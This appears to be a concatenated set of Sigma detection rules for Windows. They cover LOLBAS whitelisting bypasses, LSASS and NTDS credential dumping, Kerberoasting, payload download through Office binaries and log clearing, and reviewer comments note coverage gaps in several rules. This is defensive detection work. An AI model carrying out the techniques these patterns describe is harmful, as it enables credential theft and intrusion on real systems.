12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\bginfo.exe'
22 | CommandLine|contains|all:
23 | - '/popup'
24 | - '/nolicprompt'  # both switches must be present; the .bgi file path itself is not inspected, so a benign popup-mode run with a clean config matches too (hence medium and FP 'Unknown'). A bginfo run without /popup that still loads a scripted .bgi is not matched -- TODO confirm whether that is intended
25 | condition: selection
26 | falsepositives:
27 | - Unknown
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_calc.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Calculator Usage
2 | id: 737e618a-a410-49b5-bec3-9e55ff7fbc15
3 | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
4 | status: experimental
5 | references:
6 | - https://twitter.com/ItsReallyNick/status/1094080242686312448
7 | author: Florian Roth
8 | date: 2019/02/09
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | CommandLine: '*\calc.exe *'  # calc.exe followed by at least one argument -- the trailing space is the anchor; calc takes no arguments legitimately
18 | selection2:
19 | Image: '*\calc.exe'
20 | filter2:
21 | Image: '*\Windows\Sys*'  # excludes System32 and SysWOW64 (and anything else under Windows\Sys*); selection2 is after a copy dropped elsewhere, e.g. a temp or user directory
22 | condition: selection1 or ( selection2 and not filter2 )
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_cdb.yml:
--------------------------------------------------------------------------------
1 | title: Possible Application Whitelisting Bypass via WinDbg/CDB as a shellcode runner
2 | id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2
3 | status: experimental
4 | description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml
7 | - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\cdb.exe'  # the title names WinDbg too, but only cdb.exe is matched; windbg.exe / kd.exe with the same switch are not covered
22 | CommandLine|contains: '-cf'  # script-file switch: any script-driven debugging session matches, so the FP below is real on developer and crash-analysis machines
23 | condition: selection
24 | falsepositives:
25 | - Legitimate use of debugging tools
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_codeintegrity_check_failure.yml:
--------------------------------------------------------------------------------
1 | title: Failed Code Integrity Checks
2 | id: 470ec5fa-7b4e-4071-b200-4c753100f49b
3 | status: stable
4 | description: Code integrity failures may indicate tampered executables.
5 | author: Thomas Patzke
6 | tags:
7 | - attack.defense_evasion
8 | - attack.t1009  # NOTE(review): legacy Binary Padding id is a loose fit for an invalid image hash; confirm the intended technique when the tag set is upgraded
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID:
15 | - 5038  # image hash of a file is not valid
16 | - 6281  # page hashes of an image are not valid -- both are produced only when the 'Audit System Integrity' subcategory is enabled, which is not the default; confirm the audit policy before relying on this rule
17 | condition: selection
18 | falsepositives:
19 | - Disk device errors
20 | level: low
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_control_dll_load.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Control Panel DLL Load
2 | id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819
3 | status: experimental
4 | description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
5 | author: Florian Roth
6 | date: 2017/04/15
7 | references:
8 | - https://twitter.com/rikvduijn/status/853251879320662017
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1073
12 | - attack.t1085
13 | - car.2013-10-002
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | ParentImage: '*\System32\control.exe'  # the 32-bit copy under SysWOW64 is not matched
20 | CommandLine: '*\rundll32.exe *'
21 | filter:
22 | CommandLine: '*Shell32.dll*'  # normal applet launches go through 'Shell32.dll,Control_RunDLL'; an attacker-controlled DLL whose path merely contains 'Shell32.dll' would slip through this substring filter -- narrow it to the full 'Shell32.dll,Control_RunDLL' if your data allows
23 | condition: selection and not filter
24 | fields:
25 | - CommandLine
26 | - ParentCommandLine
27 | falsepositives:
28 | - Unknown
29 | level: high
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_csc.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Parent of Csc.exe
2 | id: b730a276-6b63-41b8-bcf8-55930c8fc6ee
3 | description: Detects a suspicious parent of csc.exe, which could be a sign of payload delivery
4 | status: experimental
5 | references:
6 | - https://twitter.com/SBousseaden/status/1094924091256176641
7 | author: Florian Roth
8 | date: 2019/02/11
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\csc.exe*'  # trailing wildcard is unusual here (the sibling csc rule uses '*\csc.exe'); it also matches e.g. csc.exe.bak -- harmless, but align the two for maintainability
18 | ParentImage:
19 | - '*\wscript.exe'
20 | - '*\cscript.exe'
21 | - '*\mshta.exe'  # powershell.exe and wmiprvse.exe are common csc parents in the same delivery chains but are not listed -- TODO decide scope; adding them raises FP volume from legitimate Add-Type usage
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_csc_folder.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Csc.exe Source File Folder
2 | id: dcaa3f04-70c3-427a-80b4-b870d73c94c4
3 | description: Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)
4 | status: experimental
5 | references:
6 | - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/
7 | - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
8 | - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/
9 | author: Florian Roth
10 | date: 2019/08/24
11 | modified: 2019/08/31
12 | tags:
13 | - attack.defense_evasion
14 | - attack.t1500
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | Image: '*\csc.exe'
21 | CommandLine:
22 | - '*\AppData\\*'  # Sigma escaping: '\\*' is a literal backslash followed by a wildcard, i.e. any path under AppData (Local\Temp included)
23 | - '*\Windows\Temp\\*'  # .NET applications that compile at runtime (e.g. XML serializer assemblies) commonly write their sources to temp folders -- expect baseline noise despite level high; a per-parent allowlist is the usual tuning
24 | condition: selection
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_devtoolslauncher.yml:
--------------------------------------------------------------------------------
1 | title: Devtoolslauncher.exe executes specified binary
2 | id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6
3 | status: experimental
4 | description: The Devtoolslauncher.exe executes other binary
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml
7 | - https://twitter.com/_felamos/status/1179811992841797632
8 | author: Beyu Denis, oscd.community (rule), @_felamos (idea)
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: critical  # NOTE(review): critical, yet the falsepositives entry below admits legitimate use -- the switch alone does not prove the launched binary is malicious; consider high, or add a filter on the launched path
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\devtoolslauncher.exe'
22 | CommandLine|contains: 'LaunchForDeploy'  # the binary to launch is presumably passed as the following argument (see the LOLBAS entry) and is not constrained here
23 | condition: selection
24 | falsepositives:
25 | - Legitimate use of devtoolslauncher.exe by legitimate user
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dhcp_config.yml:
--------------------------------------------------------------------------------
1 | title: DHCP Server Loaded the CallOut DLL
2 | id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40
3 | status: experimental
4 | description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
5 | references:
6 | - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html
7 | - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx
8 | - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
9 | date: 2017/05/15
10 | author: Dimitrios Slamaris
11 | tags:
12 | - attack.defense_evasion
13 | - attack.t1073
14 | logsource:
15 | product: windows
16 | service: system
17 | detection:
18 | selection:
19 | EventID: 1033
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dns_config.yml:
--------------------------------------------------------------------------------
1 | title: DNS Server Error Failed Loading the ServerLevelPluginDLL
2 | id: cbe51394-cd93-4473-b555-edf0144952d9
3 | description: This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
4 | status: experimental
5 | date: 2017/05/08
6 | references:
7 | - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
8 | - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx
9 | - https://twitter.com/gentilkiwi/status/861641945944391680
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1073
13 | author: Florian Roth
14 | logsource:
15 | product: windows
16 | service: dns-server
17 | detection:
18 | selection:
19 | EventID:
20 | - 150
21 | - 770
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 | level: critical
26 |
27 |
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dnx.yml:
--------------------------------------------------------------------------------
1 | title: Application Whitelisting bypass via dnx.exe
2 | id: 81ebd28b-9607-4478-bf06-974ed9d53ed7
3 | status: experimental
4 | description: Execute C# code located in the consoleapp folder
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml
7 | - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\dnx.exe'
22 | condition: selection
23 | falsepositives:
24 | - Legitimate use of dnx.exe by legitimate user
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dsrm_password_change.yml:
--------------------------------------------------------------------------------
1 | title: Password Change on Directory Service Restore Mode (DSRM) Account
2 | id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51
3 | status: stable
4 | description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.
5 | references:
6 | - https://adsecurity.org/?p=1714
7 | author: Thomas Patzke
8 | tags:
9 | - attack.persistence
10 | - attack.privilege_escalation
11 | - attack.t1098
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection:
17 | EventID: 4794
18 | condition: selection
19 | falsepositives:
20 | - Initial installation of a domain controller
21 | level: high
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dxcap.yml:
--------------------------------------------------------------------------------
1 | title: Application Whitelisting bypass via dxcap.exe
2 | id: 60f16a96-db70-42eb-8f76-16763e333590
3 | status: experimental
4 | description: Detects execution of Dxcap.exe
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml
7 | - https://twitter.com/harr0ey/status/992008180904419328
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\dxcap.exe'
22 | CommandLine|contains|all:
23 | - '-c'
24 | - '.exe'
25 | condition: selection
26 | falsepositives:
27 | - Legitimate execution of dxcap.exe by legitimate user
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_eventlog_cleared.yml:
--------------------------------------------------------------------------------
1 | title: Eventlog Cleared
2 | id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982
3 | description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
4 | references:
5 | - https://twitter.com/deviouspolack/status/832535435960209408
6 | - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
7 | author: Florian Roth
8 | tags:
9 | - attack.defense_evasion
10 | - attack.t1070
11 | - car.2016-04-002
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 104
18 | Source: Microsoft-Windows-Eventlog
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: medium
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_execution_path.yml:
--------------------------------------------------------------------------------
1 | title: Execution in Non-Executable Folder
2 | id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
3 | status: experimental
4 | description: Detects a suspicious execution from an uncommon folder. Note that the '*\$Recycle.bin' Image pattern has no trailing wildcard, so it only matches an Image ending exactly in \$Recycle.bin and will not catch executables run from inside the Recycle Bin (a pattern like '*\$Recycle.bin\\*' would)
5 | author: Florian Roth
6 | tags:
7 | - attack.defense_evasion
8 | - attack.t1036
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\$Recycle.bin'
16 | - '*\Users\All Users\\*'
17 | - '*\Users\Default\\*'
18 | - '*\Users\Public\\*'
19 | - 'C:\Perflogs\\*'
20 | - '*\config\systemprofile\\*'
21 | - '*\Windows\Fonts\\*'
22 | - '*\Windows\IME\\*'
23 | - '*\Windows\addins\\*'
24 | condition: selection
25 | fields:
26 | - CommandLine
27 | - ParentCommandLine
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_execution_path_webserver.yml:
--------------------------------------------------------------------------------
1 | title: Execution in Webserver Root Folder
2 | id: 35efb964-e6a5-47ad-bbcd-19661854018d
3 | status: experimental
4 | description: Detects a suspicious program execution in a web service root folder (filter out false positives)
5 | author: Florian Roth
6 | tags:
7 | - attack.persistence
8 | - attack.t1100
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\wwwroot\\*'
16 | - '*\wmpub\\*'
17 | - '*\htdocs\\*'
18 | filter:
19 | Image:
20 | - '*bin\\*'
21 | - '*\Tools\\*'
22 | - '*\SMSComponent\\*'
23 | ParentImage:
24 | - '*\services.exe'
25 | condition: selection and not filter
26 | fields:
27 | - CommandLine
28 | - ParentCommandLine
29 | falsepositives:
30 | - Various applications
31 | - Tools that include ping or nslookup command invocations
32 | level: medium
33 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_interactive_logons.yml:
--------------------------------------------------------------------------------
1 | title: Interactive Logon to Server Systems
2 | id: 3ff152b2-1388-4984-9cd9-a323323fdadf
3 | description: Detects interactive console logons to server systems and domain controllers. The %ServerSystems%, %DomainControllers% and %Workstations% values are placeholders that must be replaced with environment-specific host lists before the rule is deployed
4 | author: Florian Roth
5 | tags:
6 | - attack.lateral_movement
7 | - attack.t1078
8 | logsource:
9 | product: windows
10 | service: security
11 | detection:
12 | selection:
13 | EventID:
14 | - 528
15 | - 529
16 | - 4624
17 | - 4625
18 | LogonType: 2
19 | ComputerName:
20 | - '%ServerSystems%'
21 | - '%DomainControllers%'
22 | filter:
23 | LogonProcessName: Advapi
24 | ComputerName: '%Workstations%'
25 | condition: selection and not filter
26 | falsepositives:
27 | - Administrative activity via KVM or ILO board
28 | level: medium
29 |
30 |
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_iss_module_install.yml:
--------------------------------------------------------------------------------
1 | title: IIS Native-Code Module Command Line Installation
2 | id: 9465ddf4-f9e4-4ebd-8d98-702df3a93239
3 | description: Detects suspicious IIS native-code module installations via command line
4 | status: experimental
5 | references:
6 | - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/
7 | author: Florian Roth
8 | modified: 2012/12/11
9 | tags:
10 | - attack.persistence
11 | - attack.t1100
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '*\APPCMD.EXE install module /name:*'
19 | condition: selection
20 | falsepositives:
21 | - Unknown, as it may vary from organisation to organisation how admins install IIS modules
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_lsass_dump.yml:
--------------------------------------------------------------------------------
1 | title: Password Dumper Activity on LSASS
2 | id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c
3 | description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
4 | status: experimental
5 | references:
6 | - https://twitter.com/jackcr/status/807385668833968128
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | logsource:
11 | product: windows
12 | service: security
13 | detection:
14 | selection:
15 | EventID: 4656
16 | ProcessName: 'C:\Windows\System32\lsass.exe'
17 | AccessMask: '0x705'
18 | ObjectType: 'SAM_DOMAIN'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_msiexec_cwd.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious MsiExec Directory
2 | id: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144
3 | status: experimental
4 | description: Detects suspicious msiexec process starts in an uncommon directory
5 | references:
6 | - https://twitter.com/200_okay_/status/1194765831911215104
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1036
10 | author: Florian Roth
11 | date: 2019/11/14
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\msiexec.exe'
18 | filter:
19 | Image:
20 | - 'C:\Windows\System32\\*'
21 | - 'C:\Windows\SysWOW64\\*'
22 | - 'C:\Windows\WinSxS\\*'
23 | condition: selection and not filter
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_msoffice.yml:
--------------------------------------------------------------------------------
1 | title: Malicious payload download via Office binaries
2 | id: 0c79148b-118e-472b-bdb7-9b57b444cc19
3 | status: experimental
4 | description: Downloads payload from remote server
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml
7 | - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
8 | - Reegun J (OCBC Bank)
9 | author: Beyu Denis, oscd.community
10 | date: 2019/10/26
11 | modified: 2019/11/04
12 | tags:
13 | - attack.command_and_control
14 | - attack.t1105
15 | level: high
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith:
22 | - '\powerpnt.exe'
23 | - '\winword.exe'
24 | - '\excel.exe'
25 | CommandLine|contains: 'http'
26 | condition: selection
27 | falsepositives:
28 | - Unknown. Office applications opening a document directly from a web location (e.g. a SharePoint or OneDrive URL) may legitimately carry an http(s) URL on the command line, so baseline this rule before alerting on it
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ntdsutil.yml:
--------------------------------------------------------------------------------
1 | title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
2 | id: 2afafd61-6aae-4df4-baed-139fa1f4c345
3 | description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT). Note that the CommandLine pattern requires a backslash before ntdsutil, so an invocation that names the binary without a path prefix is not matched - consider also matching on Image|endswith '\ntdsutil.exe'
4 | status: experimental
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
7 | author: Thomas Patzke
8 | tags:
9 | - attack.credential_access
10 | - attack.t1003
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine: '*\ntdsutil*'
17 | condition: selection
18 | falsepositives:
19 | - NTDS maintenance
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ntlm_auth.yml:
--------------------------------------------------------------------------------
1 | title: NTLM Logon
2 | id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b
3 | status: experimental
4 | description: Detects logons using NTLM, which could be caused by a legacy source or attackers
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/1004895028995477505
7 | - https://goo.gl/PsqrhT
8 | author: Florian Roth
9 | date: 2018/06/08
10 | tags:
11 | - attack.lateral_movement
12 | - attack.t1075
13 | logsource:
14 | product: windows
15 | service: ntlm
16 | definition: Requires events from Microsoft-Windows-NTLM/Operational
17 | detection:
18 | selection:
19 | EventID: 8002
20 | CallingProcessName: '*' # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly
21 | condition: selection
22 | falsepositives:
23 | - Legacy hosts
24 | level: low
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_openwith.yml:
--------------------------------------------------------------------------------
1 | title: OpenWith.exe executes specified binary
2 | id: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f
3 | status: experimental
4 | description: The OpenWith.exe executes other binary
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml
7 | - https://twitter.com/harr0ey/status/991670870384021504
8 | author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: high
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\OpenWith.exe'
22 | CommandLine|contains: '/c'
23 | condition: selection
24 | falsepositives:
25 | - Legitimate use of OpenWith.exe by legitimate user
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_outlook.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Execution from Outlook
2 | id: e212d415-0e93-435f-9e1a-f29005bb4723
3 | status: experimental
4 | description: Detects EnableUnsafeClientMailRules used for Script Execution from Outlook
5 | references:
6 | - https://github.com/sensepost/ruler
7 | - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
8 | tags:
9 | - attack.execution
10 | - attack.t1059
11 | - attack.t1202
12 | author: Markus Neis
13 | date: 2018/12/27
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | clientMailRules:
19 | CommandLine: '*EnableUnsafeClientMailRules*'
20 | outlookExec:
21 | ParentImage: '*\outlook.exe'
22 | CommandLine: \\\\*\\*.exe
23 | condition: clientMailRules or outlookExec
24 | falsepositives:
25 | - unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_outlook_temp.yml:
--------------------------------------------------------------------------------
1 | title: Execution in Outlook Temp Folder
2 | id: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39
3 | status: experimental
4 | description: Detects a suspicious program execution in Outlook temp folder
5 | author: Florian Roth
6 | date: 2019/10/01
7 | tags:
8 | - attack.initial_access
9 | - attack.t1193
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image: '*\Temporary Internet Files\Content.Outlook\\*'
16 | condition: selection
17 | fields:
18 | - CommandLine
19 | - ParentCommandLine
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ping_hex_ip.yml:
--------------------------------------------------------------------------------
1 | title: Ping Hex IP
2 | id: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd
3 | description: Detects a ping command that uses a hex encoded IP address
4 | references:
5 | - https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna
6 | - https://twitter.com/vysecurity/status/977198418354491392
7 | author: Florian Roth
8 | date: 2018/03/23
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1140
12 | - attack.t1027
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - '*\ping.exe 0x*'
20 | - '*\ping 0x*'
21 | condition: selection
22 | fields:
23 | - ParentCommandLine
24 | falsepositives:
25 | - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_prog_location_process_starts.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Program Location Process Starts
2 | id: f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5
3 | status: experimental
4 | description: Detects programs running in suspicious file system locations. Note that the '*\$Recycle.bin' Image pattern has no trailing wildcard, so it only matches an Image ending exactly in \$Recycle.bin and will not catch executables run from inside the Recycle Bin (a pattern like '*\$Recycle.bin\\*' would)
5 | references:
6 | - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1036
10 | author: Florian Roth
11 | date: 2019/01/15
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image:
18 | - '*\$Recycle.bin'
19 | - '*\Users\Public\\*'
20 | - 'C:\Perflogs\\*'
21 | - '*\Windows\Fonts\\*'
22 | - '*\Windows\IME\\*'
23 | - '*\Windows\addins\\*'
24 | - '*\Windows\debug\\*'
25 | condition: selection
26 | falsepositives:
27 | - unknown
28 | level: high
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ps_appdata.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Script Run in AppData
2 | id: ac175779-025a-4f12-98b0-acdaeb77ea85
3 | status: experimental
4 | description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/1082851155481288706
7 | - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
8 | tags:
9 | - attack.execution
10 | - attack.t1086
11 | author: Florian Roth
12 | date: 2019/01/09
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - '* /c powershell*\AppData\Local\\*'
20 | - '* /c powershell*\AppData\Roaming\\*'
21 | condition: selection
22 | falsepositives:
23 | - Administrative scripts
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_psr_capture_screenshots.yml:
--------------------------------------------------------------------------------
1 | title: psr.exe capture screenshots
2 | id: 2158f96f-43c2-43cb-952a-ab4580f32382
3 | status: experimental
4 | description: The psr.exe captures desktop screenshots and saves them on the local machine
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml
7 | - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.persistence
13 | - attack.t1218
14 | level: medium
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | Image|endswith: '\Psr.exe'
21 | CommandLine|contains: '/start'
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rasdial_activity.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RASdial Activity
2 | id: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e
3 | description: Detects suspicious process related to rasdial.exe. Note that the selection value 'rasdial' contains no wildcard and is therefore an exact match on the whole CommandLine field, so an invocation with arguments or a path prefix is not matched - a pattern such as '*rasdial*' or Image|endswith '\rasdial.exe' covers those
4 | status: experimental
5 | references:
6 | - https://twitter.com/subTee/status/891298217907830785
7 | author: juju4
8 | tags:
9 | - attack.defense_evasion
10 | - attack.execution
11 | - attack.t1064
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - rasdial
19 | condition: selection
20 | falsepositives:
21 | - False positives depend on scripts and administrative tools used in the monitored environment
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rc4_kerberos.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Kerberos RC4 Ticket Encryption
2 | id: 496a0e47-0a33-4dca-b009-9e6ca3591f39
3 | status: experimental
4 | references:
5 | - https://adsecurity.org/?p=3458
6 | - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
7 | tags:
8 | - attack.credential_access
9 | - attack.t1208
10 | description: Detects service ticket requests using RC4 encryption type
11 | logsource:
12 | product: windows
13 | service: security
14 | detection:
15 | selection:
16 | EventID: 4769
17 | TicketOptions: '0x40810000'
18 | TicketEncryptionType: '0x17'
19 | reduction:
20 | - ServiceName: '$*'
21 | condition: selection and not reduction
22 | falsepositives:
23 | - Service accounts used on legacy systems (e.g. NetApp)
